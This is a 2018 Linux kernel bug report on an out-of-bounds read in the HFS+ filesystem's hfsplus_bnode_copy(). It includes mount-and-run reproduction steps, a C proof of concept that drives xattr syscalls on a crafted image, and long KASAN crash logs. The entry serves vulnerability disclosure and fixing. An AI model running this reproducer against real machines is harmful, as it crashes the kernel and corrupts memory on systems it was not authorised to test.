Bug 200287 - Out-of-bound access in hfsplus_bnode_copy() when calling setxattr() on a corrupted hfs+ image
Summary: Out-of-bound access in hfsplus_bnode_copy() when calling setxattr() on a corr...
Status: NEW
Alias: None
Product: File System
Classification: Unclassified
Component: HFS/HFSPLUS (show other bugs)
Hardware: All Linux
: P1 normal
Assignee: fs_hfs@kernel-bugs.osdl.org
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-06-27 03:36 UTC by Wen Xu
Modified: 2018-06-27 03:36 UTC (History)

See Also:
Kernel Version: 4.18
Subsystem:
Regression: No
Bisected commit-id:


Attachments
The (compressed) crafted image which causes crash (4.00 MB, application/octet-stream)
2018-06-27 03:36 UTC, Wen Xu
Details

Description Wen Xu 2018-06-27 03:36:02 UTC
Created attachment 276889 [details]
The (compressed) crafted image which causes crash

- Reproduce (4.18)
# mkdir mnt
# mount -t hfsplus 3.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

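/*
 * Run the xattr syscall sequence from the report against
 * "<mpoint>/foo/bar/xattr": listxattr, removexattr, then setxattr with
 * XATTR_CREATE followed by XATTR_REPLACE.
 *
 * @mpoint: mount point of the hfsplus image under test; must be non-NULL.
 *
 * Each syscall's failure is reported on stderr but does not abort the
 * sequence, so the later calls still run on a partially failing image.
 */
static void activity(char *mpoint) {
  /* Build the path with a bounded formatter instead of asprintf(), so the
   * buffer length is explicit and the result is checked before use. */
  static const char suffix[] = "/foo/bar/xattr";
  size_t path_len = strlen(mpoint) + sizeof(suffix); /* sizeof includes the NUL */
  char *xattr = malloc(path_len);
  if (xattr == NULL) {
    perror("malloc");
    return;
  }
  int written = snprintf(xattr, path_len, "%s%s", mpoint, suffix);
  if (written < 0 || (size_t)written >= path_len) {
    fprintf(stderr, "path formatting failed\n");
    free(xattr);
    return;
  }

  /* buf2 is first the listxattr output buffer and then, whatever
   * listxattr left in it, the 113-byte setxattr payload; both the reuse
   * and the size are kept as in the original reproducer. */
  char buf2[113];
  memset(buf2, 0, sizeof(buf2));

  if (listxattr(xattr, buf2, sizeof(buf2)) < 0) {
    perror("listxattr");
  }
  if (removexattr(xattr, "user.mime_type") < 0) {
    perror("removexattr");
  }
  if (setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE) < 0) {
    perror("setxattr(XATTR_CREATE)");
  }
  if (setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE) < 0) {
    perror("setxattr(XATTR_REPLACE)");
  }

  free(xattr);
}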

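/*
 * Entry point: argv[1] is the mount point of the image under test.
 * Returns 0 after running the reproducer, 1 on a usage error.
 */
int main(int argc, char *argv[]) {
  /* Without this check a missing argument dereferences a NULL argv[1]. */
  if (argc < 2 || argv[1] == NULL) {
    fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
    return 1;
  }
  activity(argv[1]);
  return 0;
}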

- Kernel message
[  278.718053] hfsplus: new node 0 already hashed?
[  278.719227] WARNING: CPU: 1 PID: 1410 at fs/hfsplus/bnode.c:584 hfsplus_bnode_create+0x1f3/0x200
[  278.719233] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  278.719627] CPU: 1 PID: 1410 Comm: a.out Not tainted 4.18.0-rc1+ #6
[  278.719630] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  278.719641] RIP: 0010:hfsplus_bnode_create+0x1f3/0x200
[  278.719643] Code: 4c 89 ff e8 ef f4 ff ff 48 83 c4 08 48 c7 c0 fb ff ff ff 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 c7 c7 a0 38 96 ae e8 b1 ba bb ff <0f> 0b 4c 89 e0 eb c0 66 0f 1f 44 00 00 66 66 66 66 90 55 48 89 e5
[  278.719698] RSP: 0018:ffff8801e8db7308 EFLAGS: 00010286
[  278.719708] RAX: 0000000000000023 RBX: ffff8801e07a006c RCX: 0000000000000000
[  278.719710] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d1b6e57
[  278.719713] RBP: ffff8801e8db7338 R08: ffffed003ede4f21 R09: ffffed003ede4f21
[  278.719716] R10: 0000000000000001 R11: ffffed003ede4f20 R12: ffff8801e082db80
[  278.719718] R13: 0000000000000000 R14: ffff8801e07a0000 R15: ffff8801e07a0000
[  278.719722] FS:  00007f5a92cc6700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  278.719725] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  278.719728] CR2: 00007f5a9272e170 CR3: 00000001e5612000 CR4: 00000000000006e0
[  278.719739] Call Trace:
[  278.719753]  hfsplus_bmap_alloc+0x671/0x690
[  278.719760]  ? hfsplus_btree_write+0x1d0/0x1d0
[  278.719800]  ? remove_stable_node+0x78/0xa0
[  278.719809]  ? hfsplus_strcmp+0x97/0xe0
[  278.719816]  ? memcpy+0x45/0x50
[  278.719821]  ? hfsplus_bnode_read+0xb1/0x140
[  278.719827]  hfs_bnode_split+0xb2/0x6b0
[  278.719830]  ? memcpy+0x45/0x50
[  278.719835]  ? hfsplus_bnode_read+0xb1/0x140
[  278.719840]  ? hfs_bnode_need_zeroout+0x80/0x80
[  278.719845]  ? hfsplus_bnode_read_u16+0x6e/0xa0
[  278.719849]  ? hfsplus_bnode_read+0x140/0x140
[  278.719855]  hfsplus_brec_insert+0x1d6/0x6c0
[  278.719861]  ? hfsplus_brec_keylen+0x130/0x130
[  278.719866]  ? __kmalloc+0x11f/0x240
[  278.719872]  hfsplus_create_attr+0x263/0x2b0
[  278.719877]  ? hfsplus_attr_exists+0x140/0x140
[  278.719913]  ? strncmp+0x3d/0xc0
[  278.719919]  __hfsplus_setxattr+0x2d5/0x1160
[  278.719950]  ? unwind_get_return_address+0x36/0x50
[  278.719956]  ? kasan_check_write+0x14/0x20
[  278.719971]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  278.719978]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  278.719982]  ? save_stack+0x46/0xd0
[  278.719986]  ? kasan_kmalloc+0xad/0xe0
[  278.719990]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.719994]  ? hfsplus_setxattr+0x4c/0xb0
[  278.719998]  ? hfsplus_user_setxattr+0x27/0x30
[  278.720011]  ? __vfs_setxattr+0x7c/0xa0
[  278.720015]  ? __vfs_setxattr_noperm+0x8d/0x200
[  278.720019]  ? vfs_setxattr+0xb3/0xc0
[  278.720022]  ? setxattr+0x1b3/0x260
[  278.720026]  ? path_setxattr+0x134/0x170
[  278.720029]  ? __x64_sys_setxattr+0x6d/0x80
[  278.720042]  ? do_syscall_64+0x78/0x170
[  278.720047]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.720052]  ? save_stack+0xb5/0xd0
[  278.720055]  ? save_stack+0x46/0xd0
[  278.720058]  ? kasan_kmalloc+0xad/0xe0
[  278.720062]  ? __kmalloc_node+0x11e/0x2e0
[  278.720078]  ? kvmalloc_node+0x31/0x80
[  278.720082]  ? setxattr+0x114/0x260
[  278.720086]  ? path_setxattr+0x134/0x170
[  278.720089]  ? __x64_sys_setxattr+0x6d/0x80
[  278.720093]  ? do_syscall_64+0x78/0x170
[  278.720098]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.720102]  ? save_stack+0xb5/0xd0
[  278.720105]  ? save_stack+0x46/0xd0
[  278.720109]  ? __kasan_slab_free+0x13c/0x1a0
[  278.720112]  ? kasan_slab_free+0xe/0x10
[  278.720116]  ? kmem_cache_free+0x89/0x1e0
[  278.720125]  ? putname+0x80/0x90
[  278.720129]  ? filename_lookup+0x191/0x280
[  278.720133]  ? kasan_unpoison_shadow+0x36/0x50
[  278.720137]  ? kasan_kmalloc+0xad/0xe0
[  278.720142]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.720148]  hfsplus_setxattr+0x8a/0xb0
[  278.720152]  hfsplus_user_setxattr+0x27/0x30
[  278.720156]  __vfs_setxattr+0x7c/0xa0
[  278.720161]  __vfs_setxattr_noperm+0x8d/0x200
[  278.720165]  vfs_setxattr+0xb3/0xc0
[  278.720170]  setxattr+0x1b3/0x260
[  278.720174]  ? vfs_setxattr+0xc0/0xc0
[  278.720178]  ? filename_lookup+0x191/0x280
[  278.720182]  ? filename_parentat+0x2b0/0x2b0
[  278.720186]  ? kasan_kmalloc+0xad/0xe0
[  278.720191]  ? kasan_check_write+0x14/0x20
[  278.720213]  ? strncpy_from_user+0xa8/0x1c0
[  278.720226]  ? __mnt_is_readonly.part.13+0x23/0x30
[  278.720231]  ? __mnt_want_write+0x9d/0xb0
[  278.720236]  path_setxattr+0x134/0x170
[  278.720240]  ? setxattr+0x260/0x260
[  278.720249]  ? vm_brk+0x20/0x20
[  278.720255]  __x64_sys_setxattr+0x6d/0x80
[  278.720260]  do_syscall_64+0x78/0x170
[  278.720265]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.720285] RIP: 0033:0x7f5a927e71fa
[  278.720287] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  278.720343] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  278.720347] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa
[  278.720350] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080
[  278.720353] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000
[  278.720355] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0
[  278.720361] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000
[  278.720366] ---[ end trace 7f5a46c7478f1295 ]---
[  278.720395] hfsplus: new node 0 already hashed?
[  278.721376] WARNING: CPU: 1 PID: 1410 at fs/hfsplus/bnode.c:584 hfsplus_bnode_create+0x1f3/0x200
[  278.721377] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  278.721441] CPU: 1 PID: 1410 Comm: a.out Tainted: G        W         4.18.0-rc1+ #6
[  278.721444] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  278.721449] RIP: 0010:hfsplus_bnode_create+0x1f3/0x200
[  278.721450] Code: 4c 89 ff e8 ef f4 ff ff 48 83 c4 08 48 c7 c0 fb ff ff ff 5b 41 5c 41 5d 41 5e 41 5f 5d c3 48 c7 c7 a0 38 96 ae e8 b1 ba bb ff <0f> 0b 4c 89 e0 eb c0 66 0f 1f 44 00 00 66 66 66 66 90 55 48 89 e5
[  278.721505] RSP: 0018:ffff8801e8db7318 EFLAGS: 00010282
[  278.721509] RAX: 0000000000000023 RBX: ffff8801e07a006c RCX: 0000000000000000
[  278.721511] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d1b6e59
[  278.721514] RBP: ffff8801e8db7348 R08: ffffed003ede3ebb R09: ffffed003ede3ebb
[  278.721517] R10: 0000000000000001 R11: ffffed003ede3eba R12: ffff8801e082db80
[  278.721519] R13: 0000000000000000 R14: ffff8801e07a0000 R15: ffff8801e07a0000
[  278.721523] FS:  00007f5a92cc6700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  278.721525] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  278.721528] CR2: 00007f5a9272e170 CR3: 00000001e5612000 CR4: 00000000000006e0
[  278.721532] Call Trace:
[  278.721540]  hfsplus_bmap_alloc+0x671/0x690
[  278.721545]  ? hfsplus_btree_write+0x1d0/0x1d0
[  278.721550]  ? hfsplus_bnode_put+0x190/0x190
[  278.721554]  ? memcpy+0x45/0x50
[  278.721559]  ? hfsplus_bnode_read+0xb1/0x140
[  278.721565]  hfs_btree_inc_height+0xd3/0x450
[  278.721569]  ? hfs_brec_update_parent+0xa6/0x560
[  278.721574]  ? hfs_bnode_split+0x6b0/0x6b0
[  278.721588]  ? mark_page_accessed+0x133/0x200
[  278.721594]  ? hfsplus_bnode_put+0xb8/0x190
[  278.721599]  hfsplus_brec_insert+0x5a5/0x6c0
[  278.721605]  ? hfsplus_brec_keylen+0x130/0x130
[  278.721609]  ? __kmalloc+0x11f/0x240
[  278.721615]  hfsplus_create_attr+0x263/0x2b0
[  278.721621]  ? hfsplus_attr_exists+0x140/0x140
[  278.721626]  ? strncmp+0x3d/0xc0
[  278.721632]  __hfsplus_setxattr+0x2d5/0x1160
[  278.721637]  ? unwind_get_return_address+0x36/0x50
[  278.721642]  ? kasan_check_write+0x14/0x20
[  278.721647]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  278.721653]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  278.721657]  ? save_stack+0x46/0xd0
[  278.721661]  ? kasan_kmalloc+0xad/0xe0
[  278.721665]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.721669]  ? hfsplus_setxattr+0x4c/0xb0
[  278.721673]  ? hfsplus_user_setxattr+0x27/0x30
[  278.721677]  ? __vfs_setxattr+0x7c/0xa0
[  278.721680]  ? __vfs_setxattr_noperm+0x8d/0x200
[  278.721684]  ? vfs_setxattr+0xb3/0xc0
[  278.721687]  ? setxattr+0x1b3/0x260
[  278.721691]  ? path_setxattr+0x134/0x170
[  278.721694]  ? __x64_sys_setxattr+0x6d/0x80
[  278.721698]  ? do_syscall_64+0x78/0x170
[  278.721703]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.721708]  ? save_stack+0xb5/0xd0
[  278.721711]  ? save_stack+0x46/0xd0
[  278.721714]  ? kasan_kmalloc+0xad/0xe0
[  278.721718]  ? __kmalloc_node+0x11e/0x2e0
[  278.721723]  ? kvmalloc_node+0x31/0x80
[  278.721726]  ? setxattr+0x114/0x260
[  278.721730]  ? path_setxattr+0x134/0x170
[  278.721733]  ? __x64_sys_setxattr+0x6d/0x80
[  278.721737]  ? do_syscall_64+0x78/0x170
[  278.721746]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.721751]  ? save_stack+0xb5/0xd0
[  278.721776]  ? save_stack+0x46/0xd0
[  278.721780]  ? __kasan_slab_free+0x13c/0x1a0
[  278.721783]  ? kasan_slab_free+0xe/0x10
[  278.721787]  ? kmem_cache_free+0x89/0x1e0
[  278.721790]  ? putname+0x80/0x90
[  278.721794]  ? filename_lookup+0x191/0x280
[  278.721798]  ? kasan_unpoison_shadow+0x36/0x50
[  278.721802]  ? kasan_kmalloc+0xad/0xe0
[  278.721807]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.721812]  hfsplus_setxattr+0x8a/0xb0
[  278.721817]  hfsplus_user_setxattr+0x27/0x30
[  278.721821]  __vfs_setxattr+0x7c/0xa0
[  278.721825]  __vfs_setxattr_noperm+0x8d/0x200
[  278.721830]  vfs_setxattr+0xb3/0xc0
[  278.721834]  setxattr+0x1b3/0x260
[  278.721838]  ? vfs_setxattr+0xc0/0xc0
[  278.721842]  ? filename_lookup+0x191/0x280
[  278.721846]  ? filename_parentat+0x2b0/0x2b0
[  278.721850]  ? kasan_kmalloc+0xad/0xe0
[  278.721855]  ? kasan_check_write+0x14/0x20
[  278.721860]  ? strncpy_from_user+0xa8/0x1c0
[  278.721865]  ? __mnt_is_readonly.part.13+0x23/0x30
[  278.721870]  ? __mnt_want_write+0x9d/0xb0
[  278.721874]  path_setxattr+0x134/0x170
[  278.721878]  ? setxattr+0x260/0x260
[  278.721882]  ? vm_brk+0x20/0x20
[  278.721887]  __x64_sys_setxattr+0x6d/0x80
[  278.721897]  do_syscall_64+0x78/0x170
[  278.721903]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.721906] RIP: 0033:0x7f5a927e71fa
[  278.721907] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  278.721962] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  278.721966] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa
[  278.721969] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080
[  278.721972] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000
[  278.721974] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0
[  278.721976] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000
[  278.721980] ---[ end trace 7f5a46c7478f1296 ]---
[  278.725358] ==================================================================
[  278.726920] BUG: KASAN: slab-out-of-bounds in hfsplus_bnode_copy+0x2a8/0x360
[  278.728353] Read of size 8 at addr ffff8801e082db60 by task a.out/1410

[  278.730053] CPU: 1 PID: 1410 Comm: a.out Tainted: G        W         4.18.0-rc1+ #6
[  278.730056] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  278.730058] Call Trace:
[  278.730066]  dump_stack+0x7b/0xb5
[  278.730071]  print_address_description+0x70/0x290
[  278.730075]  kasan_report+0x291/0x390
[  278.730080]  ? hfsplus_bnode_copy+0x2a8/0x360
[  278.730090]  __asan_load8+0x54/0x90
[  278.730094]  hfsplus_bnode_copy+0x2a8/0x360
[  278.730099]  ? hfsplus_bnode_write+0xc2/0x170
[  278.730104]  hfs_btree_inc_height+0x2b5/0x450
[  278.730110]  ? hfs_bnode_split+0x6b0/0x6b0
[  278.730118]  ? mark_page_accessed+0x133/0x200
[  278.730124]  ? hfsplus_bnode_put+0xb8/0x190
[  278.730129]  hfsplus_brec_insert+0x5a5/0x6c0
[  278.730135]  ? hfsplus_brec_keylen+0x130/0x130
[  278.730139]  ? __kmalloc+0x11f/0x240
[  278.730146]  hfsplus_create_attr+0x263/0x2b0
[  278.730155]  ? hfsplus_attr_exists+0x140/0x140
[  278.730160]  ? strncmp+0x3d/0xc0
[  278.730165]  __hfsplus_setxattr+0x2d5/0x1160
[  278.730171]  ? unwind_get_return_address+0x36/0x50
[  278.730177]  ? kasan_check_write+0x14/0x20
[  278.730185]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  278.730191]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  278.730195]  ? save_stack+0x46/0xd0
[  278.730198]  ? kasan_kmalloc+0xad/0xe0
[  278.730202]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.730207]  ? hfsplus_setxattr+0x4c/0xb0
[  278.730211]  ? hfsplus_user_setxattr+0x27/0x30
[  278.730217]  ? __vfs_setxattr+0x7c/0xa0
[  278.730227]  ? __vfs_setxattr_noperm+0x8d/0x200
[  278.730235]  ? vfs_setxattr+0xb3/0xc0
[  278.730239]  ? setxattr+0x1b3/0x260
[  278.730242]  ? path_setxattr+0x134/0x170
[  278.730246]  ? __x64_sys_setxattr+0x6d/0x80
[  278.730250]  ? do_syscall_64+0x78/0x170
[  278.730255]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.730260]  ? save_stack+0xb5/0xd0
[  278.730264]  ? save_stack+0x46/0xd0
[  278.730267]  ? kasan_kmalloc+0xad/0xe0
[  278.730271]  ? __kmalloc_node+0x11e/0x2e0
[  278.730275]  ? kvmalloc_node+0x31/0x80
[  278.730280]  ? setxattr+0x114/0x260
[  278.730285]  ? path_setxattr+0x134/0x170
[  278.730290]  ? __x64_sys_setxattr+0x6d/0x80
[  278.730298]  ? do_syscall_64+0x78/0x170
[  278.730302]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.730306]  ? save_stack+0xb5/0xd0
[  278.730309]  ? save_stack+0x46/0xd0
[  278.730312]  ? __kasan_slab_free+0x13c/0x1a0
[  278.730316]  ? kasan_slab_free+0xe/0x10
[  278.730320]  ? kmem_cache_free+0x89/0x1e0
[  278.730324]  ? putname+0x80/0x90
[  278.730329]  ? filename_lookup+0x191/0x280
[  278.730334]  ? kasan_unpoison_shadow+0x36/0x50
[  278.730341]  ? kasan_kmalloc+0xad/0xe0
[  278.730346]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.730352]  hfsplus_setxattr+0x8a/0xb0
[  278.730356]  hfsplus_user_setxattr+0x27/0x30
[  278.730361]  __vfs_setxattr+0x7c/0xa0
[  278.730369]  __vfs_setxattr_noperm+0x8d/0x200
[  278.730374]  vfs_setxattr+0xb3/0xc0
[  278.730378]  setxattr+0x1b3/0x260
[  278.730382]  ? vfs_setxattr+0xc0/0xc0
[  278.730387]  ? filename_lookup+0x191/0x280
[  278.730391]  ? filename_parentat+0x2b0/0x2b0
[  278.730398]  ? kasan_kmalloc+0xad/0xe0
[  278.730403]  ? kasan_check_write+0x14/0x20
[  278.730408]  ? strncpy_from_user+0xa8/0x1c0
[  278.730413]  ? __mnt_is_readonly.part.13+0x23/0x30
[  278.730419]  ? __mnt_want_write+0x9d/0xb0
[  278.730426]  path_setxattr+0x134/0x170
[  278.730430]  ? setxattr+0x260/0x260
[  278.730434]  ? vm_brk+0x20/0x20
[  278.730438]  __x64_sys_setxattr+0x6d/0x80
[  278.730443]  do_syscall_64+0x78/0x170
[  278.730448]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.730453] RIP: 0033:0x7f5a927e71fa
[  278.730455] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  278.730525] RSP: 002b:00007ffd01ecc4f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc
[  278.730529] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5a927e71fa
[  278.730532] RDX: 00007ffd01ecc520 RSI: 00000000004008a4 RDI: 0000000000d55080
[  278.730534] RBP: 00007ffd01ecc5a0 R08: 0000000000000001 R09: 0000000000000000
[  278.730538] R10: 0000000000000071 R11: 0000000000000202 R12: 00000000004005e0
[  278.730542] R13: 00007ffd01ecc6a0 R14: 0000000000000000 R15: 0000000000000000

[  278.730894] Allocated by task 1410:
[  278.731642]  save_stack+0x46/0xd0
[  278.731647]  kasan_kmalloc+0xad/0xe0
[  278.731651]  __kmalloc+0x11f/0x240
[  278.731657]  __hfs_bnode_create+0xc6/0x3f0
[  278.731665]  hfsplus_bnode_find+0x1f0/0x500
[  278.731669]  hfsplus_brec_find+0x1c1/0x2e0
[  278.731673]  hfsplus_find_attr+0xb2/0xd0
[  278.731676]  hfsplus_listxattr+0x273/0x6e0
[  278.731679]  vfs_listxattr+0x9d/0xc0
[  278.731684]  listxattr+0x58/0xd0
[  278.731689]  path_listxattr+0xb9/0x120
[  278.731692]  __x64_sys_listxattr+0x48/0x50
[  278.731700]  do_syscall_64+0x78/0x170
[  278.731705]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[  278.732051] Freed by task 0:
[  278.732676] (stack is not available)

[  278.733779] The buggy address belongs to the object at ffff8801e082db00
                which belongs to the cache kmalloc-96 of size 96
[  278.736283] The buggy address is located 0 bytes to the right of
                96-byte region [ffff8801e082db00, ffff8801e082db60)
[  278.738721] The buggy address belongs to the page:
[  278.739721] page:ffffea0007820b40 count:1 mapcount:0 mapping:ffff8801f6803500 index:0x0
[  278.741355] flags: 0x2ffff0000000100(slab)
[  278.742229] raw: 02ffff0000000100 dead000000000100 dead000000000200 ffff8801f6803500
[  278.743776] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000
[  278.745321] page dumped because: kasan: bad access detected

[  278.746786] Memory state around the buggy address:
[  278.747765]  ffff8801e082da00: fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc
[  278.749249]  ffff8801e082da80: fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc
[  278.750731] >ffff8801e082db00: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc
[  278.752197]                                                        ^
[  278.753497]  ffff8801e082db80: 00 00 00 00 00 00 00 00 00 00 00 00 fc fc fc fc
[  278.754982]  ffff8801e082dc00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  278.756448] ==================================================================
[  278.799025] Disabling lock debugging due to kernel taint
[  278.800160] general protection fault: 0000 [#1] SMP KASAN PTI
[  278.801417] CPU: 0 PID: 1410 Comm: a.out Tainted: G    B   W         4.18.0-rc1+ #6
[  278.803004] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  278.804953] RIP: 0010:__memcpy+0x12/0x20
[  278.805773] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  278.809613] RSP: 0018:ffff8801e8db7430 EFLAGS: 00010246
[  278.810705] RAX: a805570000016000 RBX: 0000000000001000 RCX: 0000000000000200
[  278.812157] RDX: 0000000000000000 RSI: 700556c000016000 RDI: a805570000016000
[  278.813606] RBP: ffff8801e8db7450 R08: ffffed003e09c499 R09: ffffed003e09c499
[  278.815062] R10: 0000000000000001 R11: ffffed003e09c498 R12: a805570000016000
[  278.816505] R13: 700556c000016000 R14: ffff8801e082db60 R15: 0000000000001000
[  278.817960] FS:  00007f5a92cc6700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  278.819599] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  278.820770] CR2: 00007f828de0901a CR3: 00000001e5612000 CR4: 00000000000006f0
[  278.822230] Call Trace:
[  278.822757]  ? memcpy+0x45/0x50
[  278.823422]  hfsplus_bnode_copy+0x333/0x360
[  278.824287]  ? hfsplus_bnode_write+0xc2/0x170
[  278.825187]  hfs_btree_inc_height+0x2b5/0x450
[  278.826102]  ? hfs_bnode_split+0x6b0/0x6b0
[  278.826954]  ? mark_page_accessed+0x133/0x200
[  278.827856]  ? hfsplus_bnode_put+0xb8/0x190
[  278.828722]  hfsplus_brec_insert+0x5a5/0x6c0
[  278.829607]  ? hfsplus_brec_keylen+0x130/0x130
[  278.830539]  ? __kmalloc+0x11f/0x240
[  278.831283]  hfsplus_create_attr+0x263/0x2b0
[  278.832167]  ? hfsplus_attr_exists+0x140/0x140
[  278.833085]  ? strncmp+0x3d/0xc0
[  278.833771]  __hfsplus_setxattr+0x2d5/0x1160
[  278.834664]  ? unwind_get_return_address+0x36/0x50
[  278.835654]  ? kasan_check_write+0x14/0x20
[  278.836508]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  278.837443]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  278.838647]  ? save_stack+0x46/0xd0
[  278.839372]  ? kasan_kmalloc+0xad/0xe0
[  278.840149]  ? kmem_cache_alloc_trace+0x102/0x200
[  278.841115]  ? hfsplus_setxattr+0x4c/0xb0
[  278.841956]  ? hfsplus_user_setxattr+0x27/0x30
[  278.842869]  ? __vfs_setxattr+0x7c/0xa0
[  278.843658]  ? __vfs_setxattr_noperm+0x8d/0x200
[  278.844589]  ? vfs_setxattr+0xb3/0xc0
[  278.845347]  ? setxattr+0x1b3/0x260
[  278.846083]  ? path_setxattr+0x134/0x170
[  278.846895]  ? __x64_sys_setxattr+0x6d/0x80
[  278.847760]  ? do_syscall_64+0x78/0x170
[  278.848557]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  278.849629]  ? save_stack+0xb5/0xd0
[  278.850364]  ? save_stack+0x46/0xd0
[  278.851088]  ? kasan_kmalloc+0xad/0xe0
[  278.851862]  ? __kmalloc_node+0x11e/0x2e0
[  278.852690]  ? kvmalloc_node+0x31/0x80
[  278.853466]  ? setxattr+0x114/0x260
